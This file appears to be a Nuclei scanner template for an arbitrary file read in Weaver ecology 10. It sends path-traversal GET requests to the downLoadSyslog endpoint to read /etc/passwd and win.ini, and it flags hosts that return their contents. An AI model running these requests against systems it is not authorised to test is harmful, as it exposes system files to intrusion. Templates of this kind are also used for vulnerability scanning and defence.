id: weaver-ecology-v10-downLoadSyslog-fileread
info:
  name: 泛微-ecology-10 downLoadSyslog 存在任意文件读取
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://bdziyi.com/67232/
  classification:
    cve-id: 
  metadata:
    verified: false
    fofa-query: demo
    tips:
    repair:
    version:
  tags: fileread,weaver,ecology

http:
  - method: GET
    path:
      - "{{BaseURL}}/papi/em/transform/downLoadSyslog?logPath=../../.././.././././../../etc/passwd"
      - "{{BaseURL}}/papi/em/transform/downLoadSyslog?logPath=../../.././.././././../../c:/windows/win.ini"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200